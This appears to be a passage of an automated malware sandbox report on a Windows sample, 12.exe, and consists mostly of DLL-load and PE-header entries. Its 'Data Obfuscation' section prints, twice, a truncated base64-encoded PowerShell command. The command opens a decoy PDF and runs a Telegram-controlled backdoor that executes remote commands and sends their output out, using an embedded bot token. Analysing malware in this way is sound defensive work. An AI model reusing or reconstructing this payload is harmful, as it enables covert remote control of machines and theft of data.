Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\12.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: 12.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 12.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 12.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 12.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 12.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 12.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 12.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 12.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 12.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.3965066226.000001C861FC2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ConsoleApplication5\x64\Release\ConsoleApplication5.pdb" source: 12.exe
Source: Binary string: C:\Users\Admin\source\repos\ConsoleApplication5\x64\Release\ConsoleApplication5.pdb source: 12.exe
Source: 12.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 12.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 12.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 12.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 12.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\12.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\/file.pdf'; powershell.exe -e 'JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABV
Source: C:\Users\user\Desktop\12.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\/file.pdf'; powershell.exe -e 'JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848E62320 push eax; iretd 5_2_00007FF848E6233D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848E600BD pushad ; iretd 5_2_00007FF848E600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
